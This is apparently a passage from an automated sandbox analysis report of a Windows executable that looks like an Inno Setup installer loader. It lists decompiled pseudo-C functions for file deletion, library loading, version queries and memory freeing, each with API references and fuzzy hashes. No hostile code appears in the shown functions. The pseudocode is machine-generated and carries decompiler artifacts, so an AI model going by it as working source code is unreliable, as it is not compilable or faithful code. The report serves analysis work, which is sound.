                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID: InnoSetupLdrWindow$STATIC
                                                            • API String ID: 716092398-2209255943
                                                            • Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                            • Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
                                                            • Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                            • Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
                                                            				intOrPtr _v8;
                                                            				long _t5;
                                                            				long _t9;
                                                            				void* _t10;
                                                            				void* _t13;
                                                            				void* _t15;
                                                            				void* _t16;
                                                            
                                                            				_t5 = __eax;
                                                            				_v8 = __edx;
                                                            				_t9 = __eax;
                                                            				_t15 = _t10 - 1;
                                                            				if(_t15 < 0) {
                                                            					L10:
                                                            					return _t5;
                                                            				}
                                                            				_t16 = _t15 + 1;
                                                            				_t13 = 0;
                                                            				while(1) {
                                                            					_t19 = _t13 - 1;
                                                            					if(_t13 != 1) {
                                                            						__eflags = _t13 - 1;
                                                            						if(__eflags > 0) {
                                                            							Sleep(_a4);
                                                            						}
                                                            					} else {
                                                            						Sleep(_a8);
                                                            					}
                                                            					_t5 = E00427154(_t9, _v8, _t19); // executed
                                                            					if(_t5 != 0) {
                                                            						goto L10;
                                                            					}
                                                            					_t5 = GetLastError();
                                                            					if(_t5 == 2) {
                                                            						goto L10;
                                                            					}
                                                            					_t5 = GetLastError();
                                                            					if(_t5 == 3) {
                                                            						goto L10;
                                                            					}
                                                            					_t13 = _t13 + 1;
                                                            					_t16 = _t16 - 1;
                                                            					if(_t16 != 0) {
                                                            						continue;
                                                            					}
                                                            					goto L10;
                                                            				}
                                                            				goto L10;
                                                            			}











                                                            APIs
                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorLastSleep
                                                            • String ID:
                                                            • API String ID: 1458359878-0
                                                            • Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                            • Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
                                                            • Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                            • Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 63%
                                                            			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
                                                            				char _v8;
                                                            				char _v9;
                                                            				int _v16;
                                                            				void* _v20;
                                                            				void* _v24;
                                                            				int _v28;
                                                            				int _t33;
                                                            				int _t43;
                                                            				int _t64;
                                                            				intOrPtr _t72;
                                                            				intOrPtr _t74;
                                                            				signed int* _t77;
                                                            				signed int* _t79;
                                                            				void* _t81;
                                                            				void* _t82;
                                                            				intOrPtr _t83;
                                                            
                                                            				_t81 = _t82;
                                                            				_t83 = _t82 + 0xffffffe8;
                                                            				_v8 = 0;
                                                            				_t77 = __ecx;
                                                            				_t79 = __edx;
                                                            				_push(_t81);
                                                            				_push(0x420094);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t83;
                                                            				_v9 = 0;
                                                            				E00407E48( &_v8, __eax);
                                                            				E00407FB0( &_v8);
                                                            				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
                                                            				_t64 = _t33;
                                                            				if(_t64 == 0) {
                                                            					_pop(_t72);
                                                            					 *[fs:eax] = _t72;
                                                            					_push(0x42009b);
                                                            					return E00407A20( &_v8);
                                                            				} else {
                                                            					_v20 = E004053F0(_t64);
                                                            					_push(_t81);
                                                            					_push(0x420077);
                                                            					_push( *[fs:edx]);
                                                            					 *[fs:edx] = _t83;
                                                            					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
                                                            					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
                                                            						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
                                                            						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
                                                            						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
                                                            						_v9 = 1;
                                                            					}
                                                            					_pop(_t74);
                                                            					 *[fs:eax] = _t74;
                                                            					_push(0x42007e);
                                                            					return E0040540C(_v20);
                                                            				}
                                                            			}




















                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
                                                            • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
                                                            • VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileInfoVersion$QuerySizeValue
                                                            • String ID:
                                                            • API String ID: 2179348866-0
                                                            • Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                            • Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
                                                            • Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                            • Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
                                                            				intOrPtr _v8;
                                                            				signed int _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				signed int _t41;
                                                            				signed short _t43;
                                                            				signed short _t46;
                                                            				signed int _t60;
                                                            				intOrPtr _t68;
                                                            				void* _t79;
                                                            				signed int* _t81;
                                                            				intOrPtr _t84;
                                                            
                                                            				_t79 = __edi;
                                                            				_t61 = __ecx;
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_t81 = __ecx;
                                                            				_v12 = __edx;
                                                            				_v8 = __eax;
                                                            				E00407B04(_v8);
                                                            				E00407B04(_v12);
                                                            				_push(_t84);
                                                            				_push(0x40b227);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t84;
                                                            				E00407A20(__ecx);
                                                            				if(_v12 == 0) {
                                                            					L14:
                                                            					_pop(_t68);
                                                            					 *[fs:eax] = _t68;
                                                            					_push(E0040B22E);
                                                            					return E00407A80( &_v28, 6);
                                                            				}
                                                            				E00407E48( &_v20, _v12);
                                                            				_t41 = _v12;
                                                            				if(_t41 != 0) {
                                                            					_t41 =  *(_t41 - 4);
                                                            				}
                                                            				_t60 = _t41;
                                                            				if(_t60 < 1) {
                                                            					L7:
                                                            					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
                                                            					if(_v16 == 0) {
                                                            						L00403730();
                                                            						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
                                                            						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
                                                            						__eflags =  *_t81;
                                                            						if( *_t81 == 0) {
                                                            							__eflags =  *0x4bdc0c;
                                                            							if( *0x4bdc0c == 0) {
                                                            								L00403738();
                                                            								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
                                                            								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
                                                            							}
                                                            						}
                                                            						__eflags =  *_t81;
                                                            						if(__eflags == 0) {
                                                            							E0040B044(_v20, _t60, _t81, __eflags); // executed
                                                            						}
                                                            					} else {
                                                            						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
                                                            					}
                                                            					goto L14;
                                                            				}
                                                            				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
                                                            					_t60 = _t60 - 1;
                                                            					__eflags = _t60;
                                                            					if(_t60 != 0) {
                                                            						continue;
                                                            					}
                                                            					goto L7;
                                                            				}
                                                            				_t61 = _t60;
                                                            				E004088AC(_v12, _t60, 1,  &_v20);
                                                            				goto L7;
                                                            			}

















                                                            0x0040b18f
                                                            0x00000000

                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
                                                            • GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: DefaultLanguage$SystemUser
                                                            • String ID:
                                                            • API String ID: 384301227-0
                                                            • Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                            • Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
                                                            • Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                            • Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				char _v8;
                                                            				short _v530;
                                                            				char _v536;
                                                            				char _v540;
                                                            				void* _t44;
                                                            				intOrPtr _t45;
                                                            				void* _t49;
                                                            				void* _t52;
                                                            
                                                            				_v536 = 0;
                                                            				_v540 = 0;
                                                            				_v8 = 0;
                                                            				_t49 = __eax;
                                                            				_push(_t52);
                                                            				_push(0x40b2ee);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t52 + 0xfffffde8;
                                                            				GetModuleFileNameW(0,  &_v530, 0x105);
                                                            				E00408550( &_v536, _t49);
                                                            				_push(_v536);
                                                            				E0040858C( &_v540, 0x105,  &_v530);
                                                            				_pop(_t44); // executed
                                                            				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
                                                            				if(_v8 != 0) {
                                                            					LoadLibraryExW(E004084EC(_v8), 0, 2);
                                                            				}
                                                            				_pop(_t45);
                                                            				 *[fs:eax] = _t45;
                                                            				_push(E0040B2F5);
                                                            				E00407A80( &_v540, 2);
                                                            				return E00407A20( &_v8);
                                                            			}












                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName
                                                            • String ID:
                                                            • API String ID: 1159719554-0
                                                            • Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                            • Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
                                                            • Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                            • Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E00427154(void* __eax, void* __edx, void* __eflags) {
                                                            				int _v8;
                                                            				char _v16;
                                                            				long _v20;
                                                            				int _t13;
                                                            				intOrPtr _t27;
                                                            				void* _t32;
                                                            				void* _t34;
                                                            				intOrPtr _t35;
                                                            
                                                            				_t32 = _t34;
                                                            				_t35 = _t34 + 0xfffffff0;
                                                            				if(E00427108(__eax,  &_v16) != 0) {
                                                            					_push(_t32);
                                                            					_push(0x4271b1);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t35;
                                                            					_t13 = DeleteFileW(E004084EC(__edx)); // executed
                                                            					_v8 = _t13;
                                                            					_v20 = GetLastError();
                                                            					_pop(_t27);
                                                            					 *[fs:eax] = _t27;
                                                            					_push(E004271B8);
                                                            					return E00427144( &_v16);
                                                            				} else {
                                                            					_v8 = 0;
                                                            					return _v8;
                                                            				}
                                                            			}












                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
                                                            • GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2018770650-0
                                                            • Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                            • Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
                                                            • Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                            • Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E00421230(void* __eax, void* __ebx, int __edx) {
                                                            				struct HINSTANCE__* _v12;
                                                            				int _v16;
                                                            				int _t4;
                                                            				struct HINSTANCE__* _t9;
                                                            				void* _t12;
                                                            				intOrPtr _t16;
                                                            				void* _t18;
                                                            				void* _t19;
                                                            				intOrPtr _t20;
                                                            
                                                            				_t18 = _t19;
                                                            				_t20 = _t19 + 0xfffffff4;
                                                            				_t12 = __eax;
                                                            				_t4 = SetErrorMode(__edx); // executed
                                                            				_v16 = _t4;
                                                            				_push(_t18);
                                                            				_push(0x4212a2);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t20;
                                                            				asm("fnstcw word [ebp-0x2]");
                                                            				_push(_t18);
                                                            				_push(0x421284);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t20;
                                                            				_t9 = LoadLibraryW(E004084EC(_t12)); // executed
                                                            				_v12 = _t9;
                                                            				_pop(_t16);
                                                            				 *[fs:eax] = _t16;
                                                            				_push(0x42128b);
                                                            				asm("fclex");
                                                            				asm("fldcw word [ebp-0x2]");
                                                            				return 0;
                                                            			}













                                                            APIs
                                                            • SetErrorMode.KERNEL32 ref: 0042123A
                                                            • LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorLibraryLoadMode
                                                            • String ID:
                                                            • API String ID: 2987862817-0
                                                            • Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                            • Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
                                                            • Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                            • Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004052D4() {
                                                            				intOrPtr _t13;
                                                            				intOrPtr* _t14;
                                                            				int _t18;
                                                            				intOrPtr* _t23;
                                                            				void* _t25;
                                                            				void* _t26;
                                                            				void* _t28;
                                                            				void* _t31;
                                                            
                                                            				_t28 =  *0x004BBADC;
                                                            				while(_t28 != 0x4bbad8) {
                                                            					_t2 = _t28 + 4; // 0x4bbad8
                                                            					VirtualFree(_t28, 0, 0x8000); // executed
                                                            					_t28 =  *_t2;
                                                            				}
                                                            				_t25 = 0x37;
                                                            				_t13 = 0x4b7080;
                                                            				do {
                                                            					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
                                                            					 *((intOrPtr*)(_t13 + 8)) = _t13;
                                                            					 *((intOrPtr*)(_t13 + 0x10)) = 1;
                                                            					 *((intOrPtr*)(_t13 + 0x14)) = 0;
                                                            					_t13 = _t13 + 0x20;
                                                            					_t25 = _t25 - 1;
                                                            				} while (_t25 != 0);
                                                            				 *0x4bbad8 = 0x4bbad8;
                                                            				 *0x004BBADC = 0x4bbad8;
                                                            				_t26 = 0x400;
                                                            				_t23 = 0x4bbb78;
                                                            				do {
                                                            					_t14 = _t23;
                                                            					 *_t14 = _t14;
                                                            					_t8 = _t14 + 4; // 0x4bbb78
                                                            					 *_t8 = _t14;
                                                            					_t23 = _t23 + 8;
                                                            					_t26 = _t26 - 1;
                                                            				} while (_t26 != 0);
                                                            				 *0x4bbaf4 = 0;
                                                            				E00405884(0x4bbaf8, 0x80);
                                                            				_t18 = 0;
                                                            				 *0x4bbaf0 = 0;
                                                            				_t31 =  *0x004BDB80;
                                                            				while(_t31 != 0x4bdb7c) {
                                                            					_t10 = _t31 + 4; // 0x4bdb7c
                                                            					_t18 = VirtualFree(_t31, 0, 0x8000);
                                                            					_t31 =  *_t10;
                                                            				}
                                                            				 *0x4bdb7c = 0x4bdb7c;
                                                            				 *0x004BDB80 = 0x4bdb7c;
                                                            				return _t18;
                                                            			}












                                                            APIs
                                                            • VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
                                                            • VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                            • Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
                                                            • Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                            • Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004232EC(long __eax, void* __edx) {
                                                            				short _v2052;
                                                            				signed int _t7;
                                                            				void* _t10;
                                                            				signed int _t16;
                                                            				void* _t17;
                                                            
                                                            				_t10 = __edx;
                                                            				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
                                                            				while(_t7 > 0) {
                                                            					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
                                                            					if(_t16 <= 0x20) {
                                                            						L1:
                                                            						_t7 = _t7 - 1;
                                                            						__eflags = _t7;
                                                            						continue;
                                                            					} else {
                                                            						_t20 = _t16 - 0x2e;
                                                            						if(_t16 == 0x2e) {
                                                            							goto L1;
                                                            						}
                                                            					}
                                                            					break;
                                                            				}
                                                            				return E00407BA8(_t10, _t7, _t17, _t20);
                                                            			}









                                                            APIs
                                                            • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FormatMessage
                                                            • String ID:
                                                            • API String ID: 1306739567-0
                                                            • Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                            • Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
                                                            • Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                            • Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 31%
                                                            			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
                                                            				char _v8;
                                                            				intOrPtr _t21;
                                                            				intOrPtr _t24;
                                                            
                                                            				_push(0);
                                                            				_push(_t24);
                                                            				_push(0x422a5e);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t24;
                                                            				E004229AC(__eax, __ecx,  &_v8, __eflags);
                                                            				GetFileAttributesW(E004084EC(_v8)); // executed
                                                            				_pop(_t21);
                                                            				 *[fs:eax] = _t21;
                                                            				_push(E00422A65);
                                                            				return E00407A20( &_v8);
                                                            			}







                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                            • Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
                                                            • Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                            • Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
                                                            				void* _t17;
                                                            
                                                            				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
                                                            				return _t17;
                                                            			}





                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                            • Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
                                                            • Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                            • Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00409FA8(void* __eax) {
                                                            				short _v532;
                                                            				void* __ebx;
                                                            				void* __esi;
                                                            				intOrPtr _t14;
                                                            				void* _t16;
                                                            				void* _t18;
                                                            				void* _t19;
